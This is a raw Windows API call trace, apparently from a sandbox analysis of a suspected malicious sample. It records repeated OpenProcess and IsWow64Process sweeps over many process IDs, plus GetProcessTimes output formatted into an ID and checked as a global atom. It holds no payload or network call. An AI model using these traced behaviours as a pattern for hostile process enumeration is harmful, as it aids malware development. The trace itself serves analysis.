	[0117.897] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0117.897] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0117.897] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0117.897] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0117.897] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0117.898] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0117.898] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0117.898] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0117.898] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0117.898] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0117.898] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.898] CloseHandle (hObject=0x698) returned 1
	[0117.898] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0117.899] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0117.899] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0117.899] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.914] CloseHandle (hObject=0x698) returned 1
	[0117.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0117.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0117.914] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.914] CloseHandle (hObject=0x698) returned 1
	[0117.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0117.914] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.914] CloseHandle (hObject=0x698) returned 1
	[0117.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0117.915] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.915] CloseHandle (hObject=0x698) returned 1
	[0117.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0117.915] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.915] CloseHandle (hObject=0x698) returned 1
	[0117.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0117.915] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.915] CloseHandle (hObject=0x698) returned 1
	[0117.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0117.915] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.915] CloseHandle (hObject=0x698) returned 1
	[0117.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0117.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0117.916] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.916] CloseHandle (hObject=0x698) returned 1
	[0117.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0117.916] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.916] CloseHandle (hObject=0x698) returned 1
	[0117.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0117.916] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.916] CloseHandle (hObject=0x698) returned 1
	[0117.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0117.916] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.916] CloseHandle (hObject=0x698) returned 1
	[0117.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0117.917] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.917] CloseHandle (hObject=0x698) returned 1
	[0117.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0117.917] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.917] CloseHandle (hObject=0x698) returned 1
	[0117.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0117.917] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.917] CloseHandle (hObject=0x698) returned 1
	[0117.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0117.917] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.917] CloseHandle (hObject=0x698) returned 1
	[0117.918] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0117.918] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.918] CloseHandle (hObject=0x698) returned 1
	[0117.918] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0117.918] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.918] CloseHandle (hObject=0x698) returned 1
	[0117.918] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0117.918] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.918] CloseHandle (hObject=0x698) returned 1
	[0117.918] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0117.918] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.918] CloseHandle (hObject=0x698) returned 1
	[0117.918] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0117.918] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.919] CloseHandle (hObject=0x698) returned 1
	[0117.919] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0117.919] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.919] CloseHandle (hObject=0x698) returned 1
	[0117.919] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0117.919] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.919] CloseHandle (hObject=0x698) returned 1
	[0117.919] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0117.919] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.919] CloseHandle (hObject=0x698) returned 1
	[0117.919] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0117.919] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.919] CloseHandle (hObject=0x698) returned 1
	[0117.920] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0117.920] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.920] CloseHandle (hObject=0x698) returned 1
	[0117.920] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0117.980] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.980] CloseHandle (hObject=0x698) returned 1
	[0117.980] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0117.980] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.980] CloseHandle (hObject=0x698) returned 1
	[0117.980] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0117.980] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.980] CloseHandle (hObject=0x698) returned 1
	[0117.980] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0117.980] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.980] CloseHandle (hObject=0x698) returned 1
	[0117.981] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0117.981] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.981] CloseHandle (hObject=0x698) returned 1
	[0117.981] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0117.981] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0117.981] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0117.981] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0117.982] wsprintfA (in: param_1=0x39936c8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0117.982] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0117.982] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0117.982] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0117.982] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0117.983] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0117.983] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0117.983] CloseHandle (hObject=0x698) returned 1
	[0117.983] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0117.983] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0117.983] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.983] CloseHandle (hObject=0x698) returned 1
	[0117.983] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0117.983] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.983] CloseHandle (hObject=0x698) returned 1
	[0117.983] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0117.983] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.983] CloseHandle (hObject=0x698) returned 1
	[0118.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0118.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0118.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0118.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0118.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0118.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0118.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0118.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0118.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0118.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0118.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0118.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0118.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0118.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0118.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0118.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0118.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0118.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0118.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0118.029] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.029] CloseHandle (hObject=0x698) returned 1
	[0118.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0118.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0118.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0118.029] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.029] CloseHandle (hObject=0x698) returned 1
	[0118.030] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0118.030] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0118.030] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.030] CloseHandle (hObject=0x698) returned 1
	[0118.030] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0118.030] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.030] CloseHandle (hObject=0x698) returned 1
	[0118.030] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0118.030] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.030] CloseHandle (hObject=0x698) returned 1
	[0118.030] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0118.030] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.031] CloseHandle (hObject=0x698) returned 1
	[0118.031] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0118.031] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.031] CloseHandle (hObject=0x698) returned 1
	[0118.031] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0118.031] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.031] CloseHandle (hObject=0x698) returned 1
	[0118.031] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0118.031] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0118.031] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.031] CloseHandle (hObject=0x698) returned 1
	[0118.031] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0118.031] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.031] CloseHandle (hObject=0x698) returned 1
	[0118.032] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0118.032] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.032] CloseHandle (hObject=0x698) returned 1
	[0118.032] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0118.036] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.036] CloseHandle (hObject=0x698) returned 1
	[0118.036] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0118.036] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.036] CloseHandle (hObject=0x698) returned 1
	[0118.037] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0118.037] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.037] CloseHandle (hObject=0x698) returned 1
	[0118.037] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0118.037] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.037] CloseHandle (hObject=0x698) returned 1
	[0118.037] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0118.037] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.037] CloseHandle (hObject=0x698) returned 1
	[0118.037] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0118.037] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.037] CloseHandle (hObject=0x698) returned 1
	[0118.037] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0118.037] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.038] CloseHandle (hObject=0x698) returned 1
	[0118.038] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0118.038] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.038] CloseHandle (hObject=0x698) returned 1
	[0118.038] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0118.038] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.038] CloseHandle (hObject=0x698) returned 1
	[0118.038] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0118.038] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.038] CloseHandle (hObject=0x698) returned 1
	[0118.038] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0118.038] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.038] CloseHandle (hObject=0x698) returned 1
	[0118.039] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0118.039] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.039] CloseHandle (hObject=0x698) returned 1
	[0118.039] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0118.039] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.039] CloseHandle (hObject=0x698) returned 1
	[0118.039] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0118.039] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.039] CloseHandle (hObject=0x698) returned 1
	[0118.039] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0118.039] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.039] CloseHandle (hObject=0x698) returned 1
	[0118.039] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0118.040] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.040] CloseHandle (hObject=0x698) returned 1
	[0118.040] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0118.040] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.040] CloseHandle (hObject=0x698) returned 1
	[0118.040] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0118.040] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.040] CloseHandle (hObject=0x698) returned 1
	[0118.040] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0118.040] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.040] CloseHandle (hObject=0x698) returned 1
	[0118.040] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0118.040] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.041] CloseHandle (hObject=0x698) returned 1
	[0118.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0118.041] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.041] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0118.041] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0118.041] wsprintfA (in: param_1=0x3993268, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0118.042] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.042] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0118.042] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.042] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0118.042] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0118.042] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0118.043] CloseHandle (hObject=0x698) returned 1
	[0118.043] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0118.043] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0118.043] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.043] CloseHandle (hObject=0x698) returned 1
	[0118.043] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0118.043] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.043] CloseHandle (hObject=0x698) returned 1
	[0118.043] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0118.043] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.043] CloseHandle (hObject=0x698) returned 1
	[0118.076] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0118.076] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0118.076] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0118.076] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0118.077] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0118.077] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0118.077] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0118.077] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0118.077] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0118.077] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0118.077] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0118.078] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0118.078] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0118.078] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0118.078] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0118.078] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0118.078] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0118.079] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0118.079] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0118.079] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.079] CloseHandle (hObject=0x698) returned 1
	[0118.079] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0118.079] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0118.079] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0118.079] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.080] CloseHandle (hObject=0x698) returned 1
	[0118.080] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0118.083] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
